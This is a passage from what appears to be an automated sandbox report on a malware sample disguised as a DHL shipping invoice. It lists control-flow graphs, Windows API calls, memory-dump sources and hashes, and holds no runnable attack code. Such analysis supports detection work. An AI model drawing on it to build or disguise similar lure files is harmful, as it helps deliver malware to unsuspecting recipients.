                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 004055AE
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004055CF
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004054DD
                                                                                                                                                                                                                                        • Part of subcall function 00404266: SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405621
                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405636
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 0040565A
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 0040565F
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000008), ref: 004056A9
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 004056EE
                                                                                                                                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00405722
                                                                                                                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040573B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405783
                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00405789
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0040579F
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004057D3
                                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 004057E4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                      • String ID: {
                                                                                                                                                                                                                                      • API String ID: 590372296-366298937
                                                                                                                                                                                                                                      • Opcode ID: b747a118dcd76f797ac229e86f31520b95951f9f2fd18a8a10ba66df94a6a7c7
                                                                                                                                                                                                                                      • Instruction ID: 0d33ea325d25f8e5d5623e6ebdd73ca6fcd7ab1b09301a5b30cdd6c49ec902ff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b747a118dcd76f797ac229e86f31520b95951f9f2fd18a8a10ba66df94a6a7c7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7B15770900608FFDB119FA0DD89AAE7BB9FB48355F00403AFA41BA1A0CB755E51DF68

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 375 403d58-403d6a 376 403d70-403d76 375->376 377 403eab-403eba 375->377 376->377 378 403d7c-403d85 376->378 379 403f09-403f1e 377->379 380 403ebc-403f04 GetDlgItem * 2 call 404231 SetClassLongW call 40140b 377->380 383 403d87-403d94 SetWindowPos 378->383 384 403d9a-403d9d 378->384 381 403f20-403f23 379->381 382 403f5e-403f63 call 40427d 379->382 380->379 387 403f25-403f30 call 401389 381->387 388 403f56-403f58 381->388 397 403f68-403f83 382->397 383->384 390 403db7-403dbd 384->390 391 403d9f-403db1 ShowWindow 384->391 387->388 410 403f32-403f51 SendMessageW 387->410 388->382 396 4041fe 388->396 393 403dd9-403ddc 390->393 394 403dbf-403dd4 DestroyWindow 390->394 391->390 401 403dde-403dea SetWindowLongW 393->401 402 403def-403df5 393->402 399 4041db-4041e1 394->399 400 404200-404207 396->400 404 403f85-403f87 call 40140b 397->404 405 403f8c-403f92 397->405 399->396 412 4041e3-4041e9 399->412 401->400 408 403e98-403ea6 call 404298 402->408 409 403dfb-403e0c GetDlgItem 402->409 404->405 406 403f98-403fa3 405->406 407 4041bc-4041d5 DestroyWindow EndDialog 405->407 406->407 414 403fa9-403ff6 call 4062dc call 404231 * 3 GetDlgItem 406->414 407->399 408->400 415 403e2b-403e2e 409->415 416 403e0e-403e25 SendMessageW IsWindowEnabled 409->416 410->400 412->396 413 4041eb-4041f4 ShowWindow 412->413 413->396 445 404000-40403c ShowWindow EnableWindow call 404253 EnableWindow 414->445 446 403ff8-403ffd 414->446 419 403e30-403e31 415->419 420 403e33-403e36 415->420 416->396 416->415 423 403e61-403e66 call 40420a 419->423 424 403e44-403e49 420->424 425 403e38-403e3e 420->425 423->408 429 403e7f-403e92 SendMessageW 424->429 430 403e4b-403e51 424->430 428 403e40-403e42 425->428 425->429 428->423 429->408 433 403e53-403e59 call 40140b 430->433 434 403e68-403e71 call 40140b 430->434 441 403e5f 433->441 434->408 443 403e73-403e7d 434->443 441->423 443->441 449 404041 445->449 450 40403e-40403f 445->450 446->445 451 404043-404071 GetSystemMenu EnableMenuItem SendMessageW 449->451 450->451 452 404073-404084 SendMessageW 451->452 453 404086 451->453 454 40408c-4040cb call 404266 call 403d39 call 4062ba lstrlenW call 4062dc SetWindowTextW call 401389 452->454 453->454 454->397 465 4040d1-4040d3 454->465 465->397 466 4040d9-4040dd 465->466 467 4040fc-404110 DestroyWindow 466->467 468 4040df-4040e5 466->468 467->399 470 404116-404143 CreateDialogParamW 467->470 468->396 469 4040eb-4040f1 468->469 469->397 471 4040f7 469->471 470->399 472 404149-4041a0 call 404231 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 470->472 471->396 472->396 477 4041a2-4041ba ShowWindow call 40427d 472->477 477->399
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00403DB1
                                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00403DC5
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403E02
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
                                                                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403E1D
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403ECB
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403ED5
                                                                                                                                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
                                                                                                                                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F40
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403FE6
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00404007
                                                                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00404019
                                                                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00404034
                                                                                                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040404A
                                                                                                                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 00404051
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404069
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 004040A6
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,0042D248), ref: 004040BA
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 004041EE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 184305955-0
                                                                                                                                                                                                                                      • Opcode ID: 0b7b1c17639b6d1c33985b6847ccd2c8cf6276db4693f940084e8c077b1e5a4a
                                                                                                                                                                                                                                      • Instruction ID: e03fc219ec92158800d4d40d681534e4389e9639ccb8e5563fa4604b390d03ca
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b7b1c17639b6d1c33985b6847ccd2c8cf6276db4693f940084e8c077b1e5a4a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29C1D171600300ABDB216F61ED89E2B3AB8FB95746F04053EF641B51F0CB799982DB6D

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 480 4039aa-4039c2 call 406694 483 4039c4-4039d4 call 406201 480->483 484 4039d6-403a0d call 406188 480->484 491 403a30-403a59 call 403c80 call 405c97 483->491 489 403a25-403a2b lstrcatW 484->489 490 403a0f-403a20 call 406188 484->490 489->491 490->489 498 403aeb-403af3 call 405c97 491->498 499 403a5f-403a64 491->499 505 403b01-403b26 LoadImageW 498->505 506 403af5-403afc call 4062dc 498->506 499->498 500 403a6a-403a92 call 406188 499->500 500->498 507 403a94-403a98 500->507 509 403ba7-403baf call 40140b 505->509 510 403b28-403b58 RegisterClassW 505->510 506->505 512 403aaa-403ab6 lstrlenW 507->512 513 403a9a-403aa7 call 405bbc 507->513 521 403bb1-403bb4 509->521 522 403bb9-403bc4 call 403c80 509->522 514 403c76 510->514 515 403b5e-403ba2 SystemParametersInfoW CreateWindowExW 510->515 519 403ab8-403ac6 lstrcmpiW 512->519 520 403ade-403ae6 call 405b8f call 4062ba 512->520 513->512 518 403c78-403c7f 514->518 515->509 519->520 525 403ac8-403ad2 GetFileAttributesW 519->525 520->498 521->518 533 403bca-403be4 ShowWindow call 406624 522->533 534 403c4d-403c55 call 4053f5 522->534 526 403ad4-403ad6 525->526 527 403ad8-403ad9 call 405bdb 525->527 526->520 526->527 527->520 541 403bf0-403c02 GetClassInfoW 533->541 542 403be6-403beb call 406624 533->542 539 403c57-403c5d 534->539 540 403c6f-403c71 call 40140b 534->540 539->521 543 403c63-403c6a call 40140b 539->543 540->514 546 403c04-403c14 GetClassInfoW RegisterClassW 541->546 547 403c1a-403c4b DialogBoxParamW call 40140b call 4038fa 541->547 542->541 543->521 546->547 547->518
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                                                                        • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00441000,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,00441800,757C3420,0043F000,00000000), ref: 00403A2B
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00432E80,?,?,?,00432E80,00000000,0043F800,00441000,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,00441800), ref: 00403AAB
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00432E78,.exe,00432E80,?,?,?,00432E80,00000000,0043F800,00441000,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403ABE
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(00432E80), ref: 00403AC9
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403B12
                                                                                                                                                                                                                                        • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                                                                                                                                                                                      • RegisterClassW.USER32(00433E80), ref: 00403B4F
                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B67
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403BD2
                                                                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BFE
                                                                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403C0B
                                                                                                                                                                                                                                      • RegisterClassW.USER32(00433E80), ref: 00403C14
                                                                                                                                                                                                                                      • DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                      • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                                      • API String ID: 1975747703-1115850852
                                                                                                                                                                                                                                      • Opcode ID: 1feb877b3cd1f17d5745dc6e86cff1def5b969e5bf70798c317c187aa9e1ce15
                                                                                                                                                                                                                                      • Instruction ID: 9f2b94ab3f1de80a41c8f53b965b22801f2352f665cd6d3f8e6571e1d6c0b700
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1feb877b3cd1f17d5745dc6e86cff1def5b969e5bf70798c317c187aa9e1ce15
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D861B9312407007ED720AF659D46E2B3A6CEB85B4AF40057FF945B51E2CBBD9941CB2D

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 554 4043f0-404402 555 404522-40452f 554->555 556 404408-404410 554->556 557 404531-40453a 555->557 558 40458c-404590 555->558 559 404412-404421 556->559 560 404423-404447 556->560 563 404540-404546 557->563 564 404665 557->564 561 404656-40465d 558->561 562 404596-4045ae GetDlgItem 558->562 559->560 565 404450-4044cb call 404231 * 2 CheckDlgButton call 404253 GetDlgItem call 404266 SendMessageW 560->565 566 404449 560->566 561->564 572 40465f 561->572 568 4045b0-4045b7 562->568 569 404617-40461e 562->569 563->564 570 40454c-404557 563->570 567 404668-40466f call 404298 564->567 596 4044d6-40451d SendMessageW * 2 lstrlenW SendMessageW * 2 565->596 597 4044cd-4044d0 GetSysColor 565->597 566->565 578 404674-404678 567->578 568->569 574 4045b9-4045d4 568->574 569->567 575 404620-404627 569->575 570->564 576 40455d-404587 GetDlgItem SendMessageW call 404253 call 40467b 570->576 572->564 574->569 579 4045d6-404614 SendMessageW LoadCursorW SetCursor call 40469f LoadCursorW SetCursor 574->579 575->567 580 404629-40462d 575->580 576->558 579->569 585 40463f-404643 580->585 586 40462f-40463d SendMessageW 580->586 590 404651-404654 585->590 591 404645-40464f SendMessageW 585->591 586->585 590->578 591->590 596->578 597->596
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040448E
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004044A2
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044BF
                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 004044D0
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 004044F1
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040456C
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 00404573
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040459E
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004045F2
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 0040460E
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040463D
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                                                      • String ID: N$gC@
                                                                                                                                                                                                                                      • API String ID: 3103080414-4003572143
                                                                                                                                                                                                                                      • Opcode ID: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                                                                                                                                                                                                      • Instruction ID: 67960cbe9d5dd80a83daf25f2437327cccbb0fafcef4e9f4d39b28ee92a42e65
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED618FB1900209BFDB109F60DD85EAA7B79FB84345F00853AF605B62D0D77DA951CFA8

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                                      • DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                      • String ID: F
                                                                                                                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                      • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                                                                                                                                                                                      • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 610 405f06-405f34 611 405f36-405f4e call 405db0 CloseHandle GetShortPathNameW 610->611 612 405f5c-405f6b GetShortPathNameW 610->612 615 40607b-40607f 611->615 618 405f54-405f56 611->618 614 405f71-405f73 612->614 612->615 614->615 617 405f79-405fb7 wsprintfA call 4062dc call 405db0 614->617 617->615 623 405fbd-405fd9 GetFileSize GlobalAlloc 617->623 618->612 618->615 624 406074-406075 CloseHandle 623->624 625 405fdf-405fe9 call 405e33 623->625 624->615 625->624 628 405fef-405ffc call 405d15 625->628 631 406012-406024 call 405d15 628->631 632 405ffe-406010 lstrcpyA 628->632 638 406043 631->638 639 406026-40602c 631->639 633 406047 632->633 636 406049-40606e call 405d6b SetFilePointer call 405e62 GlobalFree 633->636 636->624 638->633 641 406034-406036 639->641 643 406038-406041 641->643 644 40602e-406033 641->644 643->636 644->641
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004060A1,?,?), ref: 00405F41
                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F4A
                                                                                                                                                                                                                                        • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                                                                                                                        • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F67
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00405F85
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405FC0
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FCF
                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040606E
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075
                                                                                                                                                                                                                                        • Part of subcall function 00405DB0: GetFileAttributesW.KERNEL32(00442800,00402F1D,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                                                                        • Part of subcall function 00405DB0: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
